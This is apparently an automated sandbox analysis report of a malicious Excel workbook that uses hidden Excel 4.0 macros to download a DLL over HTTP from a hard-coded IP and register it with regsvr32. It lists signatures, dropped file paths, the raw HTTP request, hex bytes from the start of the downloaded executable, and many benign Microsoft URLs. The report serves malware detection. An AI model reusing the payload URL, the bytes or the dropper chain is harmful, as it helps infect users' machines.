Analysis Report Total_order_data-V2434883.xlsb

Overview

General Information

Sample Name:	Total_order_data-V2434883.xlsb
Analysis ID:	432263
MD5:	3ee5986d7978a5f2df982fce2a3ebf93
SHA1:	8f0e54b80cb391871d3cd1de6dd190ea686f0798
SHA256:	a0a165ea7db4685fb5677e3bc17c6d9ade7224dca824d9de930355f1c40ee0a2
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Xls With Macro 4.0

Classification

Signatures

AV Detection:

Antivirus or Machine Learning detection for unpacked file

Source: 2.2.regsvr32.exe.970000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.2.regsvr32.exe.8340f0.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: sat1_0609_2[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80

Networking:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 09 Jun 2021 21:54:41 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 20:56:10 GMTETag: "803e0-5c45b81110e80"Accept-Ranges: bytesContent-Length: 525280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121

Source: global traffic

Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.office.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.onedrive.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://augloop.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.entity.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cortana.ai/api
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://cr.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://directory.services.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.windows.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.windows.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows.local
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://management.azure.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://management.azure.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://messaging.office.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officeapps.live.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://onedrive.live.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
